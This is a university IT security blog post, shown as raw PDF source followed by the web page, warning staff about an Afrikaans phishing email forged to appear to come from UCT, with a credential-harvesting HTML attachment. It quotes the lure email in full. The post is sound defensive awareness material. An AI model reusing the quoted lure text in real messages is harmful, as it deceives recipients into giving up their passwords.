%PDF-1.3 1 0 obj << /Type /Catalog /Outlines 2 0 R /Pages 3 0 R >> endobj 2 0 obj << /Type /Outlines /Count 0 >> endobj 3 0 obj << /Type /Pages /Kids [6 0 R 20 0 R ] /Count 2 /Resources << /ProcSet 4 0 R /Font << /F1 8 0 R /F2 9 0 R /F3 10 0 R /F4 11 0 R >> /XObject << /I1 24 0 R >> >> /MediaBox [0.000 0.000 612.000 792.000] >> endobj 4 0 obj [/PDF /Text /ImageC ] endobj 5 0 obj << /Creator (DOMPDF) /CreationDate (D:20240519043627+00'00') /ModDate (D:20240519043627+00'00') /Title (IT-artikels) >> endobj 6 0 obj << /Type /Page /Parent 3 0 R /Annots [ 12 0 R 14 0 R 16 0 R 18 0 R ] /Contents 7 0 R >> endobj 7 0 obj << /Length 5772 >> stream 0.702 0.800 0.816 rg 34.016 34.016 543.969 723.969 re f 1.000 1.000 1.000 rg 45.266 -22.640 521.469 769.374 re f 0.773 0.773 0.773 rg 0.773 0.773 0.773 RG 45.266 746.734 m 566.734 746.734 l 565.984 745.984 l 46.016 745.984 l f 566.734 746.734 m 566.734 -22.640 l 565.984 -22.640 l 565.984 745.984 l f 45.266 746.734 m 45.266 -22.640 l 46.016 -22.640 l 46.016 745.984 l f 61.016 617.359 m 550.984 617.359 l 550.984 618.109 l 61.016 618.109 l f 1.000 1.000 1.000 rg BT 278.868 698.693 Td /F1 10.5 Tf [(POST LIST)] TJ ET 0.200 0.200 0.200 rg BT 212.789 670.111 Td /F1 14.4 Tf [(INFORMASIETEGNOLOGIE)] TJ ET BT 221.824 643.466 Td /F1 11.7 Tf [(INFORMATION TECHNOLOGY)] TJ ET BT 61.016 583.841 Td /F1 14.4 Tf [(PHISHING: RE: BETALING AAN JOU REKENING)] TJ ET 0.400 0.400 0.400 rg BT 61.016 564.033 Td /F3 9.0 Tf [(About a year ago a new version of the ABSA Bank phishing email hit the university email server. What was new about this )] TJ ET BT 61.016 553.044 Td /F3 9.0 Tf [(version was that the email was in Afrikaans. Although the Afrikaans was not perfect with some spelling and grammar )] TJ ET BT 61.016 542.055 Td /F3 9.0 Tf [(mistakes, it still could have fooled many people, because of the familiarity component.)] TJ ET BT 61.016 522.066 Td /F3 9.0 Tf [(Stellenbosch University still uses a lot of Afrikaans as its primary official communications medium, and many automated )] TJ ET BT 61.016 511.077 Td /F3 9.0 Tf [(systems like the Financial system use Afrikaans to inform users of payments etc. While there is nothing wrong with this, )] TJ ET BT 61.016 500.088 Td /F3 9.0 Tf [(phishing scammers have latched onto this and are now attempting to fool people into divulging their personal details using )] TJ ET BT 61.016 489.099 Td /F3 9.0 Tf [(Afrikaans in their phishing e-mails.)] TJ ET BT 61.016 469.110 Td /F3 9.0 Tf [(We were warnedearly this morning about an email that was originating from UCT with dangerous content, and almost )] TJ ET BT 61.016 458.121 Td /F3 9.0 Tf [(immediately the UCT phishing emails started arriving.)] TJ ET BT 61.016 438.132 Td /F3 9.0 Tf [(Here is what to look out for:)] TJ ET BT 61.016 418.143 Td /F3 9.0 Tf [(Mail will arrive from a forged or compromised UCT address that will look like this:)] TJ ET 0.592 0.592 0.592 rg 0.592 0.592 0.592 RG 305.016 408.445 m 306.516 408.445 l 305.766 407.695 l 305.766 407.695 l f 1.000 1.000 1.000 rg 1.000 1.000 1.000 RG 305.016 406.195 m 306.516 406.195 l 305.766 406.945 l 305.766 406.945 l f 306.516 408.445 m 306.516 406.195 l 305.766 406.945 l 305.766 407.695 l f 0.592 0.592 0.592 rg 0.592 0.592 0.592 RG 305.016 408.445 m 305.016 406.195 l 305.766 406.945 l 305.766 407.695 l f 0.400 0.400 0.400 rg BT 61.016 388.404 Td /F4 9.0 Tf [(From:)] TJ ET BT 86.513 388.404 Td /F3 9.0 Tf [( Anna Huang [)] TJ ET 0.373 0.169 0.255 rg BT 144.050 388.404 Td /F3 9.0 Tf [(mailto:forged_address@myuct.ac.za)] TJ ET 0.373 0.169 0.255 RG 0.18 w 0 J [ ] 0 d 144.050 387.253 m 290.237 387.253 l S 0.400 0.400 0.400 rg BT 290.237 388.404 Td /F3 9.0 Tf [(] )] TJ ET BT 61.016 377.415 Td /F4 9.0 Tf [(Sent:)] TJ ET BT 83.516 377.415 Td /F3 9.0 Tf [( 19 July 2017 10:53 AM)] TJ ET BT 61.016 366.426 Td /F4 9.0 Tf [(To:)] TJ ET BT 75.011 366.426 Td /F3 9.0 Tf [( Recipients <)] TJ ET 0.373 0.169 0.255 rg BT 127.283 366.426 Td /F3 9.0 Tf [(forged_address@myuct.ac.za)] TJ ET 0.18 w 0 J [ ] 0 d 127.283 365.275 m 246.965 365.275 l S 0.400 0.400 0.400 rg BT 246.965 366.426 Td /F3 9.0 Tf [(>)] TJ ET BT 61.016 355.437 Td /F4 9.0 Tf [(Subject:)] TJ ET BT 96.521 355.437 Td /F3 9.0 Tf [( Re: betaling aan jou rekening)] TJ ET BT 61.016 335.448 Td /F4 9.0 Tf [(Goeiemore,)] TJ ET BT 61.016 315.459 Td /F4 9.0 Tf [(Vind aangehegte betalingsbewys.)] TJ ET BT 61.016 295.470 Td /F4 9.0 Tf [(Dankie)] TJ ET BT 61.016 275.481 Td /F3 9.0 Tf [(Disclaimer - )] TJ ET BT 111.011 275.481 Td /F3 9.0 Tf [(University)] TJ ET BT 150.512 275.481 Td /F3 9.0 Tf [( of Cape Town This e-mail is subject to UCT policies and e-mail disclaimer published on our )] TJ ET BT 61.016 264.492 Td /F3 9.0 Tf [(website at)] TJ ET 0.373 0.169 0.255 rg BT 101.534 264.492 Td /F3 9.0 Tf [(http://www.uct.ac.za/about/policies/emaildisclaimer/)] TJ ET 0.18 w 0 J [ ] 0 d 101.534 263.341 m 306.599 263.341 l S 0.400 0.400 0.400 rg BT 306.599 264.492 Td /F3 9.0 Tf [( or obtainable from +27 21 650 9111. If this e-mail is not )] TJ ET BT 61.016 253.503 Td /F3 9.0 Tf [(related to the business of UCT, it is sent by the sender in an individual capacity. Please report security incidents or abuse )] TJ ET BT 61.016 242.514 Td /F3 9.0 Tf [(via)] TJ ET 0.373 0.169 0.255 rg BT 72.518 242.514 Td /F3 9.0 Tf [(csirt@uct.ac.za)] TJ ET 0.18 w 0 J [ ] 0 d 72.518 241.363 m 134.168 241.363 l S 0.592 0.592 0.592 rg 0.592 0.592 0.592 RG 305.016 232.816 m 306.516 232.816 l 305.766 232.066 l 305.766 232.066 l f 1.000 1.000 1.000 rg 1.000 1.000 1.000 RG 305.016 230.566 m 306.516 230.566 l 305.766 231.316 l 305.766 231.316 l f 306.516 232.816 m 306.516 230.566 l 305.766 231.316 l 305.766 232.066 l f 0.592 0.592 0.592 rg 0.592 0.592 0.592 RG 305.016 232.816 m 305.016 230.566 l 305.766 231.316 l 305.766 232.066 l f 0.400 0.400 0.400 rg BT 61.016 212.775 Td /F3 9.0 Tf [(The disclaimer from the University and the Afrikaans could fool some people if they are not careful.)] TJ ET BT 61.016 192.786 Td /F3 9.0 Tf [(The dangerous part is actually an attached html files \(sometimes it might look like a PDF\) that will present you with a login )] TJ ET BT 61.016 181.797 Td /F3 9.0 Tf [(page where you will be asked to give your e-mail address and your password to view this payment)] TJ ET BT 61.016 161.808 Td /F3 9.0 Tf [(The login page will look like this, in this version:)] TJ ET endstream endobj 8 0 obj << /Type /Font /Subtype /Type1 /Name /F1 /BaseFont /Helvetica-Bold /Encoding /WinAnsiEncoding >> endobj 9 0 obj << /Type /Font /Subtype /Type1 /Name /F2 /BaseFont /Helvetica /Encoding /WinAnsiEncoding >> endobj 10 0 obj << /Type /Font /Subtype /Type1 /Name /F3 /BaseFont /Helvetica-Oblique /Encoding /WinAnsiEncoding >> endobj 11 0 obj << /Type /Font /Subtype /Type1 /Name /F4 /BaseFont /Helvetica-BoldOblique /Encoding /WinAnsiEncoding >> endobj 12 0 obj << /Type /Annot /Subtype /Link /A 13 0 R /Border [0 0 0] /H /I /Rect [ 144.0497 387.5716 290.2367 396.7291 ] >> endobj 13 0 obj << /Type /Action /S /URI /URI (mailto:forged_address@myuct.ac.za) >> endobj 14 0 obj << /Type /Annot /Subtype /Link /A 15 0 R /Border [0 0 0] /H /I /Rect [ 127.2827 365.5936 246.9647 374.7511 ] >> endobj 15 0 obj << /Type /Action /S /URI /URI (mailto:forged_address@myuct.ac.za) >> endobj 16 0 obj << /Type /Annot /Subtype /Link /A 17 0 R /Border [0 0 0] /H /I /Rect [ 101.5337 263.6596 306.5987 272.8171 ] >> endobj 17 0 obj << /Type /Action /S /URI /URI (http://www.uct.ac.za/about/policies/emaildisclaimer/) >> endobj 18 0 obj << /Type /Annot /Subtype /Link /A 19 0 R /Border [0 0 0] /H /I /Rect [ 72.5177 241.6816 134.1677 250.8391 ] >> endobj 19 0 obj << /Type /Action /S /URI /URI (mailto:csirt@uct.ac.za) >> endobj 20 0 obj << /Type /Page /Parent 3 0 R /Annots [ 22 0 R ] /Contents 21 0 R >> endobj 21 0 obj << /Length 1194 >> stream 0.400 0.400 0.400 rg 0.592 0.592 0.592 RG 0.18 w 0 J [ ] 0 d 0.702 0.800 0.816 rg 34.016 34.016 543.969 723.969 re f 1.000 1.000 1.000 rg 45.266 448.561 521.469 309.423 re f 0.773 0.773 0.773 rg 0.773 0.773 0.773 RG 45.266 448.561 m 566.734 448.561 l 565.984 449.311 l 46.016 449.311 l f 566.734 757.984 m 566.734 448.561 l 565.984 449.311 l 565.984 757.984 l f 45.266 757.984 m 45.266 448.561 l 46.016 449.311 l 46.016 757.984 l f q 225.000 0 0 164.250 61.016 584.734 cm /I1 Do Q 0.400 0.400 0.400 rg BT 61.016 566.943 Td /F3 9.0 Tf [(The actual servers address is also hidden by encoding it, so to the untrained eye, nothing will look suspicious. This is a )] TJ ET BT 61.016 555.954 Td /F3 9.0 Tf [(typical phishing scam, but with the sender coming from a neighbouring academic institution, and the language being )] TJ ET BT 61.016 544.965 Td /F3 9.0 Tf [(Afrikaans, we need to be even more alert.)] TJ ET BT 458.968 524.976 Td /F3 9.0 Tf [([Article by David Wiles])] TJ ET BT 61.016 504.987 Td /F3 9.0 Tf [()] TJ ET BT 61.016 484.998 Td /F3 9.0 Tf [()] TJ ET BT 61.016 466.509 Td /F3 9.0 Tf [(Posted in:E-mail,Phishing,Security | Tagged:Phishing | With 0 comments)] TJ ET endstream endobj 22 0 obj << /Type /Annot /Subtype /Link /A 23 0 R /Border [0 0 0] /H /I /Rect [ 61.0157 584.7343 286.0157 748.9843 ] >> endobj 23 0 obj << /Type /Action /S /URI /URI (http://blogs.sun.ac.za/it/files/2017/07/phishing.jpg) >> endobj 24 0 obj << /Type /XObject /Subtype /Image /Width 300 /Height 219 /ColorSpace /DeviceRGB /Filter /DCTDecode /BitsPerComponent 8 /Length 8689>> stream JFIF;CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 82 C    !'"#%%%),($+!$%$C   $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$," }!1AQa"q2#BR$3br %&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz w!1AQaq"2B #3Rbr $4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz ?M_H|NO)HBP(&)qK\PqF)أRO4a*B)PdSH 0#"EHi#"EHE44DE0 42")*CLjhȦRa22)T*F*CL4aL4CUWZ0E"i!_"3Fq^Tkt+Xb"Q FYLTqM@1œ)8R P)q@cB)ԄXAAiSM 9(تUnzSBҞ[M݆'r(NvMS„ ♰`uHڤcOjmO}< MfCM`=*yv4܉b- Ci 0F2y 1.3M!ݵOgmH'A:uH''H'$~Xxw),yISB.zq*kJʎSxLV$F6w|MJ`E2` 1&RNIۀGҥZ2 Nz4,&Gaٲ)wgp3,8dʂr3RvYxAB3g*9HZ2d&{:A} mQfF# 00L4L40U!?VV_k: /If8=I r~IhLQԓZc9es8'be 8x|؛(6 k|\03T՝ƣݑ5aȧLkSI%,5Qu$ &{DG c/#Q Ux}\6sqq)఑<;W?|P{Goe3ϭZC?oֽ֊>S?(~}m*[QAGSo֚~}m׾QO}zfR>}?<\~ }-!kJ(O ͥ|~ ˥-4KoZ&>S?iy:1?m M? =U obE, a5:zQ=*7#Uƻn-#**5+N{qʠV)o"m/v3AO8I] uTD+y`x(nMTknP9$sеyog4bH_i`HeAosҵrWc`½*R!h.fxs2Xr7ң後4k"iVj*6)!yx ?e>ܢ5뻍z lSN3 UC9$H==]5R [Vǯ8ۑQ%ʮԪK fƿ=[OiPĦ˸=:}Z#k:g%F[h8OZ>Re%ԴEr<#yig{d0I'=Eaj/6 n$L2ϝv{cWGk#Gt֟|nQJ$NOZ^kZ$4k_LѤeLy# w\\$}N:ڧtd|l7N/k?Gڼ#^^ FS0׺xayaq xKAcr :_|&" 8d F 8IXnӁLPh8#j-($tWv#]XhC$)f#`ENнթG&jۨ! A-a[K.xm7}{_"}l`uG$RaSwmVc-v f~ےP|t r*e0כ_NTj+*ӤcG¡]4P~>\m0%K?#EοD+ kf@4Pxp= LJ4d*4/OOiU7 /Hp,c>=Ir/6O08Oq]1(Ǖ5ʎ&G>iD4#D>P`8qŗ=n&I+;p $y+xȣd*{:{˫ZK 7T-Hʰr#' k$ 'acP9=((I* #LVgGss[qo%orHGw9?Eq^ e yvc[[h&BF! N}|7mW[MGruְ?*\ ZT5hjqVwciCvr=+Ե_$i ,UPU=G!J:~VsZ]BNaH\_N5JPO;ׁC7F: Ū]-,#װB5aҹwa/g}HoNS[GAA}Z_W~_:z/CG{?]8/"1g1JM0OBiiƣc@M4M15KAcrdW/]oҏ(4j i9A !U5 %׵-зǀ+iIj'+hiNՒyF7MisX/ZTwSPFzzV>isTpM<=wl2sدtC5yvO/Tx:L ]E4%U5 i~쩐F89\G\D)~M?›al,mR=NI?֬d{P?e~G?鴟TgP?dG?鴟Td{P?e~G?鴟TQ@Ie~SdQ(i?OO*lQFEW6KT@YJZn麒]岰V)uo,,Pⱼ?kO Z\iuw:C:Zӯ?9׳u5࿴o4_G?,iғM&M0V4hiӉLcI'%crDY]oҗ4p5jpj䡩CT@Ӂ-Uk?5}o.y^kSę4~h34f5<6 W5TZW~C21l WwY2@>Z[(;pSq+&ڿWqs*kfFU3<{`vGFQ"<EWڿWgyG|>_jt~Tm_ʬ}/(<_?@GFI|>_jt~Tm_ʬ}/(<_?@/GF~Mal` f<)x|Wiu:XGk2%Y3qӥnׂ~'G{?^^Hiu࿌<Y a5L&a4!4iI@Mul+\5xDĶ_|&"8ax5Ա:rDfj PE?5fv$EU$mN5'6+.q=*\|opqIȓyk)oCu|__bЮ f0>`X>ַrŭT$z3|YrHgx`Y +akMsB FuJ8JI?S@-sŽ # V(vr@MMQϹ}̟u[W C7Q C7QG4}c(@~MM}G>0_yuJ>?ߥq<1?;<1?;QϹ}>Gv?hoҏ\w- G- Gq_suW C7Q C7QG4}`#)VBAj87T+*Ko+|ɝc@`p7=M'%wMkI褾OOt?=:;,iM4BiғL&iM4c<"[/v? "Mu?-k* /偩_U`j=}k8 N ])&]j]u.j,)nQYPYԔ{{0I1_i>?R?+j󱛣)u-;^w{>7}xVM댎*">qz 8j{_|NZTus3ޏ3޾Gß?I8ºhϷ0Ǘ=y'">qsOoc3޴}DE;B`w7#{">qsO(5K/t<.zRnd6ۄ;@q^?G">q(q b߫9e2j_qߙG_B#i?Q?ZoGcN~Otic_Cdz8IH㎵HM;4h&MP5@Ķ_@Y/v? 5J_ZB$"#@ص6##9J5;uDuU(j7T{wP"MԻ-ԻdNk`Vt֮dbk*ڜ0 W53u1ڵG}嫄ulc1Qϳ(?.w?wƱo.B~?'?S+/47s[hkO?o?o??h_F.G.}'?kQ_ S?t?=n/oY|R#^kF<wUΫo-u)c}E|%!x5u5u[j&Y_d|?=׫ugSۯU4JÌG]0N9UX8$!4h&Mz)4h&M14h&M0kqd+\q5;Asc_5`ӷT!,J5D .u.5.IuEuI{@f7PQu?u&fM&L7RnM-MM-@<4nBhIM; $SX֭MR*3␚X ڞPk Ͻ24l$…aIHM!5BiM4`Ii4]K%AZ㉮%sc_5.ēu.u.5.u.,wT[sH 7Q&7Ty4&7Ty4nQyjMԛcHM3u!4ԛ-@&i4&ni Bi&M4 L&M!4Bi &i &aVkid+XM)|FisQuhcbMԡ<њĻQ4&7Ty4&7S7Q$InFu&fi3@f4f4n,;4 SHM0 &i4٦HM4q4i )4M4)4&4HM!4Mv> ?+kv> ?+k* /F]>''Bft}F}\_>''!9?G>>>[uR?t~''hS3Q?t‘?n. }}F}7W?@?st)aGۨ_T’?n.R>NOЧهg+n5O)/&#]0\Ѻ#]')''hS3sFkR?t@BfQt|M&kRt@BfQt|L''9?G>>>G4п]п]0i3_XŽ}BN\t~п]0i3_Y{BN\?F|='.?0f‹yBN\?)aGdIE|<{'.?'(/Bf?O>I!5(/OÿrQOO>F&5(_/iaGȹ%rs} # ;q*{V'> startxref 18171 %%EOF PHISHING: “Re: betaling aan jou rekening” « Informasietegnologie
Language:
SEARCH

  • Recent Posts

  • Categories

  • Archives

«
»

PHISHING: “Re: betaling aan jou rekening”

About a year ago a new version of the ABSA Bank phishing email hit the university email server. What was new about this version was that the email was in Afrikaans. Although the Afrikaans was not perfect with some spelling and grammar mistakes, it still could have fooled many people, because of the “familiarity” component.

Stellenbosch University still uses a lot of Afrikaans as its primary official communications medium, and many automated systems like the Financial system use Afrikaans to inform users of payments etc. While there is nothing wrong with this, phishing scammers have latched onto this and are now attempting to fool people into divulging their personal details using Afrikaans in their phishing e-mails.

We were warned early this morning about an email that was originating from UCT with dangerous content, and almost immediately the UCT phishing emails started arriving.

Here is what to look out for:

Mail will arrive from a forged or compromised “UCT address” that will look like this:

From: Anna Huang [mailto:forged_address@myuct.ac.za]
Sent: 19 July 2017 10:53 AM
To: Recipients <forged_address@myuct.ac.za>
Subject: Re: betaling aan jou rekening

Goeiemore,

Vind aangehegte betalingsbewys.

Dankie

Disclaimer – University of Cape Town This e-mail is subject to UCT policies and e-mail disclaimer published on our website at http://www.uct.ac.za/about/policies/emaildisclaimer/ or obtainable from +27 21 650 9111. If this e-mail is not related to the business of UCT, it is sent by the sender in an individual capacity. Please report security incidents or abuse via csirt@uct.ac.za

The disclaimer from the University and the Afrikaans could fool some people if they are not careful.

The dangerous part is actually an attached html files (sometimes it might look like a PDF) that will present you with a login page where you will be asked to give your e-mail address and your password to “view this payment”

The login page will look like this, in this version:

The actual server’s address is also hidden by encoding it, so to the untrained eye, nothing will look suspicious. This is a typical phishing scam, but with the “sender” coming from a neighbouring academic institution, and the language being Afrikaans, we need to be even more alert.

[Article by David Wiles]

 

 

Email

Tags:

This entry was posted on Wednesday, July 19th, 2017 at 12:00 pm and is filed under E-mail, phishing, Security. You can follow any responses to this entry through the RSS 2.0 feed. Both comments and pings are currently closed.

Comments are closed.

 

© 2013-2024 Disclaimer: The views and opinions expressed in this page are strictly those of the page author(s) and content contributor(s). The contents of this page have not been reviewed or approved by Stellenbosch University.